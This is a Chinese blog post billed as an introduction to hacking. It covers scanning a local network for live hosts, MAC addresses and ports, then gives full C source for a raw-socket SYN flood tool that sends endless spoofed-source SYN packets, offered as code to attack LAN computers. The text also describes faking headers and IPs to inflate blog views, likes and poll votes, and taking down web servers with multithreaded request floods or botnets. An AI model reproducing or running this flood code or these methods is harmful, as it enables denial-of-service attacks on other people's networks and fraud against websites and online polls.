个人收藏,查询局域网电脑的IP,端口号,MAC地址(黑客技术入门)

网上看到很多都是使用nmap工具,这个工具我没有使用过,我自己实现nmap工具的功能,首先我们查询局域网内有哪些电脑是alive的,下面我写了一个脚本:

ping.sh   


这样局域网内哪些电脑的ip是alive的就可以知道,下面来查看对于IP的MAC地址,使用cat /proc/net/arp  命令:



然后在使用netstat  -an命令来分析端口号。

这样我们就轻松获取了局域网内所有电脑的信息,这时候我们使用网络编程,破坏三次握手协议去攻击电脑,或者获取抓包数据等。

查看结果分析:

Proto Recv-Q Send-Q Local Address           Foreign Address         State  
  Local Adress代表本地开放的端口,
  Foreign Adress代表的是外网的地址,
  State代表的是状态。
  Foreign Adress代表连接外网的地址。比如说登录QQ的服务器或者打开网页时都会显示不同的IP地址。
  listening代表正在监听的端口
  Established表示已激活的IP和端口
  wait表示正在等待监听


下面是我写的一个代码,可以攻击局域网内电脑:

main.c

[html]  view plain  copy
 print ? 在CODE上查看代码片 派生到我的代码片
  1. <span style="font-size:18px;">#include<errno.h>  
  2. #include<string.h>  
  3. #include<netdb.h>  
  4. #include<stdio.h>  
  5. #include<stdlib.h>  
  6. #include<unistd.h>  
  7. #include<netinet/ip.h>  
  8. #include<netinet/tcp.h>  
  9.   
  10. void send_data(int sockfd,struct sockaddr_in *addr,char *port);  
  11. unsigned short check_sum(unsigned short *addr,int len);  
  12.   
  13. // ./argv[0] des_hostname/ip   des_port  local_port    
  14. int main(int argc,char *argv[])   
  15. {   
  16.     int sockfd;   
  17.     struct sockaddr_in addr;   
  18.     struct hostent *host;   
  19.     int on=1;   
  20.       
  21.     if(argc!=4)   
  22.     {   
  23.         fprintf(stderr,"Usage:%s des_hostname/ip des_port  local_port\n",argv[0]);   
  24.         exit(EXIT_FAILURE);   
  25.     }   
  26.     
  27.     memset(&addr,0,sizeof(struct sockaddr_in));  
  28.     addr.sin_family=AF_INET;   
  29.      
  30.     if(inet_aton(argv[1],&addr.sin_addr)==0)   
  31.     {   
  32.         host=gethostbyname(argv[1]);   
  33.         if(host==NULL)   
  34.             {   
  35.                     fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));   
  36.                     exit(EXIT_FAILURE);   
  37.             }   
  38.             addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);   
  39.     }   
  40.     addr.sin_port=htons(atoi(argv[2]));   
  41.   
  42.     sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);   
  43.     if(sockfd<0)   
  44.     {   
  45.         fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));   
  46.         exit(EXIT_FAILURE);   
  47.     }   
  48.     setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));   
  49.   
  50.     send_data(sockfd,&addr,argv[3]);   
  51. }    
  52.   
  53. void send_data(int sockfd,struct sockaddr_in *addr,char *port)   
  54. {   
  55.     char buffer[100];  
  56.     struct iphdr *ip;   
  57.     struct tcphdr *tcp;   
  58.     int head_len;   
  59.   
  60.     head_len=sizeof(struct iphdr)+sizeof(struct tcphdr);   
  61.     bzero(buffer,100);   
  62.     ip=(struct iphdr *)buffer;   
  63.     ip->version=IPVERSION;  
  64.     ip->ihl=sizeof(struct ip)>>2;  
  65.     ip->tos=0;  
  66.     ip->tot_len=htons(head_len);   
  67.     ip->id=0;  
  68.     ip->frag_off=0;  
  69.     ip->ttl=MAXTTL;  
  70.     ip->protocol=IPPROTO_TCP;  
  71.   
  72.     ip->check=0;  
  73.     ip->daddr = addr->sin_addr.s_addr;  
  74.     
  75.     tcp=(struct tcphdr *)(buffer +sizeof(struct ip));   
  76.     tcp->source=htons(atoi(port));  
  77.     tcp->dest=addr->sin_port;   
  78.     tcp->seq=random();   
  79.     tcp->ack_seq=0;   
  80.     tcp->doff=5;   
  81.     tcp->syn=1;   
  82.     tcp->check=0;   
  83.   
  84.   
  85.     while(1)   
  86.     {   
  87.         ip->saddr=random();        
  88.     tcp->check=0;      
  89.     tcp->check=check_sum((unsigned short *)tcp,   
  90.              sizeof(struct tcphdr));    
  91.         sendto(sockfd,buffer,head_len,0,(struct sockaddr *)addr,(socklen_t)sizeof(struct sockaddr_in));   
  92.     }   
  93. }   
  94.   
  95. unsigned short check_sum(unsigned short *addr,int len)   
  96. {   
  97.     register int nleft=len;   
  98.     register int sum=0;   
  99.     register short *w=addr;   
  100.     short answer=0;   
  101.     while(nleft>1)   
  102.     {   
  103.         sum+=*w++;   
  104.         nleft-=2;   
  105.     }   
  106.     if(nleft==1)   
  107.     {   
  108.         *(unsigned char *)(&answer)=*(unsigned char *)w;   
  109.         sum+=answer;   
  110.     }   
  111.   
  112.     sum=(sum>>16)+(sum&0xffff);   
  113.     sum+=(sum>>16);   
  114.     answer=~sum;   
  115.     return(answer);   
  116. }  
  117. </span>  

下面在提供一些黑客技术的入门:

各大博客刷访问量的实现:首先使用Fiddler4抓取header信息,然后使用python构造header,ip等就可以轻松实现,本人各大博客,QQ空间刷赞,网页投票链接都测试过,非常实用。具体代码我就不上传上来了。也可以在Linux下使用tcpdump来抓包分析,抓包是讲究技巧的,这个手段是大量黑客长使用的方法。

攻击网页就更简单了,在python中使用不断请求,打开,采取多线程编程可以造成网络拥堵,来达到攻击的目的。如果是想黑掉整个服务器,请才用dos抓取肉鸡的方式,首选得获取到管理员权限(这个是难点)。

年轻就是资本,有的是时间和青春去挥霍,去学习技术。

不要把这些技术用到不正当的场合,开心一下就行。


我喜欢程序员,他们单纯、固执、容易体会到成就感;面对压力,能够挑灯夜战不眠不休;面对困难,能够迎难而上挑战自我。他们也会感到困惑与傍徨,但每个程序员的心中都有一个比尔盖茨或是乔布斯的梦想“用智慧开创属于自己的事业”。

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值